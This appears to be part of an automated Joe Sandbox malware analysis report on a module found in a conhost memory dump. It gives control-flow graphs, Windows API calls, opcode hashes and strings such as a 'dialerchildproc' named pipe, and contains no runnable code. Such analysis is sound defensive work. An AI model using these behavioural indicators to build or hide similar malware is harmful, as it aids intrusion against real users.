                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 321 14ecb4aa974-14ecb4aa9dc call 14ecb4ab844 324 14ecb4aa9e2-14ecb4aa9e5 321->324 325 14ecb4aae43-14ecb4aae4b call 14ecb4acb78 321->325 324->325 326 14ecb4aa9eb-14ecb4aa9f1 324->326 328 14ecb4aa9f7-14ecb4aa9fb 326->328 329 14ecb4aaac0-14ecb4aaad2 326->329 328->329 333 14ecb4aaa01-14ecb4aaa0c 328->333 331 14ecb4aaad8-14ecb4aaadc 329->331 332 14ecb4aad93-14ecb4aad97 329->332 331->332 334 14ecb4aaae2-14ecb4aaaed 331->334 336 14ecb4aad99-14ecb4aada0 332->336 337 14ecb4aadd0-14ecb4aadda call 14ecb4a9a64 332->337 333->329 335 14ecb4aaa12-14ecb4aaa17 333->335 334->332 339 14ecb4aaaf3-14ecb4aaafa 334->339 335->329 340 14ecb4aaa1d-14ecb4aaa27 call 14ecb4a9a64 335->340 336->325 341 14ecb4aada6-14ecb4aadcb call 14ecb4aae4c 336->341 337->325 347 14ecb4aaddc-14ecb4aadfb call 14ecb4a7d70 337->347 344 14ecb4aab00-14ecb4aab37 call 14ecb4a9e40 339->344 345 14ecb4aacc4-14ecb4aacd0 339->345 340->347 355 14ecb4aaa2d-14ecb4aaa58 call 14ecb4a9a64 * 2 call 14ecb4aa154 340->355 341->337 344->345 359 14ecb4aab3d-14ecb4aab45 344->359 345->337 348 14ecb4aacd6-14ecb4aacda 345->348 352 14ecb4aacdc-14ecb4aace8 call 14ecb4aa114 348->352 353 14ecb4aacea-14ecb4aacf2 348->353 352->353 366 14ecb4aad0b-14ecb4aad13 352->366 353->337 358 14ecb4aacf8-14ecb4aad05 call 14ecb4a9ce4 353->358 389 14ecb4aaa78-14ecb4aaa82 call 14ecb4a9a64 355->389 390 14ecb4aaa5a-14ecb4aaa5e 355->390 358->337 358->366 363 14ecb4aab49-14ecb4aab7b 359->363 368 14ecb4aacb7-14ecb4aacbe 363->368 369 14ecb4aab81-14ecb4aab8c 363->369 370 14ecb4aad19-14ecb4aad1d 366->370 371 14ecb4aae26-14ecb4aae42 call 14ecb4a9a64 * 2 call 14ecb4acad8 366->371 368->345 368->363 369->368 372 14ecb4aab92-14ecb4aabab 369->372 374 14ecb4aad30 370->374 375 14ecb4aad1f-14ecb4aad2e call 14ecb4aa114 370->375 371->325 376 14ecb4aabb1-14ecb4aabf6 call 14ecb4aa128 * 2 372->376 377 14ecb4aaca4-14ecb4aaca9 372->377 385 14ecb4aad33-14ecb4aad3d call 14ecb4ab8dc 374->385 375->385 402 14ecb4aabf8-14ecb4aac1e call 14ecb4aa128 call 14ecb4ab068 376->402 403 14ecb4aac34-14ecb4aac3a 376->403 382 14ecb4aacb4 377->382 382->368 385->337 400 14ecb4aad43-14ecb4aad91 call 14ecb4a9d74 call 14ecb4a9f80 385->400 389->329 406 14ecb4aaa84-14ecb4aaaa4 call 14ecb4a9a64 * 2 call 14ecb4ab8dc 389->406 390->389 394 14ecb4aaa60-14ecb4aaa6b 390->394 394->389 399 14ecb4aaa6d-14ecb4aaa72 394->399 399->325 399->389 400->337 421 14ecb4aac20-14ecb4aac32 402->421 422 14ecb4aac45-14ecb4aaca2 call 14ecb4aa8a0 402->422 410 14ecb4aac3c-14ecb4aac40 403->410 411 14ecb4aacab 403->411 427 14ecb4aaaa6-14ecb4aaab0 call 14ecb4ab9cc 406->427 428 14ecb4aaabb 406->428 410->376 412 14ecb4aacb0 411->412 412->382 421->402 421->403 422->412 431 14ecb4aaab6-14ecb4aae1f call 14ecb4a96dc call 14ecb4ab424 call 14ecb4a98d0 427->431 432 14ecb4aae20-14ecb4aae25 call 14ecb4acad8 427->432 428->329 431->432 432->371
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: db7c553b826593c7f29c7f0ee457e4f6214099b3048776279730682abb0f25df
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: A0E16B72608BA08EEF609F65E4803ED77E4F745B98F144116EF8957BAAEB34C5A0D700
                                                                  Function 0000014ECB4AF7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 442 14ecb4af7c4-14ecb4af816 443 14ecb4af907 442->443 444 14ecb4af81c-14ecb4af81f 442->444 447 14ecb4af909-14ecb4af925 443->447 445 14ecb4af829-14ecb4af82c 444->445 446 14ecb4af821-14ecb4af824 444->446 448 14ecb4af8ec-14ecb4af8ff 445->448 449 14ecb4af832-14ecb4af841 445->449 446->447 448->443 450 14ecb4af851-14ecb4af870 LoadLibraryExW 449->450 451 14ecb4af843-14ecb4af846 449->451 454 14ecb4af926-14ecb4af93b 450->454 455 14ecb4af876-14ecb4af87f GetLastError 450->455 452 14ecb4af946-14ecb4af955 GetProcAddress 451->452 453 14ecb4af84c 451->453 458 14ecb4af957-14ecb4af97e 452->458 459 14ecb4af8e5 452->459 456 14ecb4af8d8-14ecb4af8df 453->456 454->452 457 14ecb4af93d-14ecb4af940 FreeLibrary 454->457 460 14ecb4af8c6-14ecb4af8d0 455->460 461 14ecb4af881-14ecb4af898 call 14ecb4acd58 455->461 456->449 456->459 457->452 458->447 459->448 460->456 461->460 464 14ecb4af89a-14ecb4af8ae call 14ecb4acd58 461->464 464->460 467 14ecb4af8b0-14ecb4af8c4 LoadLibraryExW 464->467 467->454 467->460
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 17ed73d54c8fdc2a599f6902ab65a48de7f13dba2891dd6f55d737314785330f
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 6741D331319A2099FF16CB26B8907D563D5BB49BE0F0841299F0ED77A4FF38C455A310
                                                                  Function 0000014ECB4A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 468 14ecb4a104c-14ecb4a10b9 RegQueryInfoKeyW 469 14ecb4a10bf-14ecb4a10c9 468->469 470 14ecb4a11b5-14ecb4a11d0 468->470 469->470 471 14ecb4a10cf-14ecb4a111f RegEnumValueW 469->471 472 14ecb4a11a5-14ecb4a11af 471->472 473 14ecb4a1125-14ecb4a112a 471->473 472->470 472->471 473->472 474 14ecb4a112c-14ecb4a1135 473->474 475 14ecb4a1147-14ecb4a114c 474->475 476 14ecb4a1137 474->476 478 14ecb4a1199-14ecb4a11a3 475->478 479 14ecb4a114e-14ecb4a1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 475->479 477 14ecb4a113b-14ecb4a113f 476->477 477->472 480 14ecb4a1141-14ecb4a1145 477->480 478->472 479->478 480->475 480->477
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 327ed56d75768546d4c96c66431f82e05233670e2f6e666bacf9bcaefda00692
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: 2E414073218B80CAEB60CF61E4847AAB7E1F389B98F448115DB8947768EF38C559CB40
                                                                  Function 0000014ECB4AD498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4ACC0E,?,?,?,?,?,?,?,?,0000014ECB4AD3CD,?,?,00000001), ref: 0000014ECB4AD520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 7d315654c9dcf7b0afa7132404ae8d41cc7bad07c14864e48fef086bec9feb39
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: FE11827074D2704AFE989726B5D13E922C27B847F4F544324AB39467F6FF28C422A600
                                                                  Function 0000014ECB4A2334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: 4c5e2e94b44711ba4bcf4e331fbc922772a92f55871ec22093fc2c154d80ded9
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 3B115E32618B5087EB10CB25F48439AB7B1F389BE5F544315EB5A42BA8EF7CC149DB00
                                                                  Function 0000014ECB4A7940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 511 14ecb4a7940-14ecb4a7946 512 14ecb4a7948-14ecb4a794b 511->512 513 14ecb4a7981-14ecb4a798b 511->513 514 14ecb4a794d-14ecb4a7950 512->514 515 14ecb4a7975-14ecb4a79b4 call 14ecb4a7ff0 512->515 516 14ecb4a7aa8-14ecb4a7abd 513->516 517 14ecb4a7968 __scrt_dllmain_crt_thread_attach 514->517 518 14ecb4a7952-14ecb4a7955 514->518 534 14ecb4a79ba-14ecb4a79cf call 14ecb4a7e84 515->534 535 14ecb4a7a82 515->535 519 14ecb4a7acc-14ecb4a7ae6 call 14ecb4a7e84 516->519 520 14ecb4a7abf 516->520 526 14ecb4a796d-14ecb4a7974 517->526 522 14ecb4a7957-14ecb4a7960 518->522 523 14ecb4a7961-14ecb4a7966 call 14ecb4a7f34 518->523 532 14ecb4a7ae8-14ecb4a7b1d call 14ecb4a7fac call 14ecb4a7e4c call 14ecb4a8348 call 14ecb4a8160 call 14ecb4a8184 call 14ecb4a7fdc 519->532 533 14ecb4a7b1f-14ecb4a7b50 call 14ecb4a81c0 519->533 524 14ecb4a7ac1-14ecb4a7acb 520->524 523->526 532->524 545 14ecb4a7b61-14ecb4a7b67 533->545 546 14ecb4a7b52-14ecb4a7b58 533->546 543 14ecb4a7a9a-14ecb4a7aa7 call 14ecb4a81c0 534->543 544 14ecb4a79d5-14ecb4a79e6 call 14ecb4a7ef4 534->544 538 14ecb4a7a84-14ecb4a7a99 535->538 543->516 561 14ecb4a79e8-14ecb4a7a0c call 14ecb4a830c call 14ecb4a7e3c call 14ecb4a7e68 call 14ecb4abc3c 544->561 562 14ecb4a7a37-14ecb4a7a41 call 14ecb4a8160 544->562 551 14ecb4a7b69-14ecb4a7b73 545->551 552 14ecb4a7bae-14ecb4a7bc4 call 14ecb4a3620 545->552 546->545 550 14ecb4a7b5a-14ecb4a7b5c 546->550 557 14ecb4a7c4f-14ecb4a7c5c 550->557 558 14ecb4a7b7f-14ecb4a7b8d 551->558 559 14ecb4a7b75-14ecb4a7b7d 551->559 569 14ecb4a7bc6-14ecb4a7bc8 552->569 570 14ecb4a7bfc-14ecb4a7bfe 552->570 564 14ecb4a7b93-14ecb4a7ba8 call 14ecb4a7940 558->564 573 14ecb4a7c45-14ecb4a7c4d 558->573 559->564 561->562 611 14ecb4a7a0e-14ecb4a7a15 __scrt_dllmain_after_initialize_c 561->611 562->535 583 14ecb4a7a43-14ecb4a7a4f call 14ecb4a81b0 562->583 564->552 564->573 569->570 578 14ecb4a7bca-14ecb4a7bec call 14ecb4a3620 call 14ecb4a7aa8 569->578 579 14ecb4a7c00-14ecb4a7c03 570->579 580 14ecb4a7c05-14ecb4a7c1a call 14ecb4a7940 570->580 573->557 578->570 606 14ecb4a7bee-14ecb4a7bf3 578->606 579->573 579->580 580->573 593 14ecb4a7c1c-14ecb4a7c26 580->593 600 14ecb4a7a51-14ecb4a7a5b call 14ecb4a80c8 583->600 601 14ecb4a7a75-14ecb4a7a80 583->601 598 14ecb4a7c28-14ecb4a7c2f 593->598 599 14ecb4a7c31-14ecb4a7c41 593->599 598->573 599->573 600->601 610 14ecb4a7a5d-14ecb4a7a6b 600->610 601->538 606->570 610->601 611->562 612 14ecb4a7a17-14ecb4a7a34 call 14ecb4abbf8 611->612 612->562
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 9713f38f21fd1e9effc4a6887e95cd27bcf127c6256b1b5bb2993a5358509439
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 8981A17160C6618EFE74AB65B4C13D967D0BBA5B84F044025EB09877F6FB38C966B700
                                                                  Function 0000014ECB4AA1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA279
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,0000014ECB4AA3B3,?,?,?,0000014ECB4A9B9C,?,?,?,?,0000014ECB4A96BD), ref: 0000014ECB4AA303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 315d49ae515e22d09acecf625597c9866e29bf24ea6e77f520b0a00998addd55
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 6831D43230AA60E9EE12DB46B8907D563D4B708BA4F590635DF1E4B3A1FF39C165A301
                                                                  Function 0000014ECB4B41E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: f0b3e8d22400d30651ca63fd9f6201fa31c303bd2c6624daa0c61d426bd3b8cb
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: E9115831218E408AEB909B56F894399B6E4F798FE4F044225EB5E877A4EB38C8049740
                                                                  Function 0000014ECB4A3BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: eef9f01c175c8afa8dbd0e2b37c20d14cfe9224878dd879ff40bd6fb4b73b2d4
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: 36118E36308B4086EF549B26F4882AAA2A2F748B94F040428DF8D437A4FF3DC5549704
                                                                  Function 0000014ECB4A5F60 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 5c5425290c7b52324c38432af8d52233fbec9f91776618870fd96173ccda74e3
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: 8ED18876208B988ADE709B1AF4D439AB7E0F788B84F100116EB8D47BB5EF39C551DB00
                                                                  Function 0000014ECB4A31CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID: dialer
                                                                  • API String ID: 756756679-3528709123
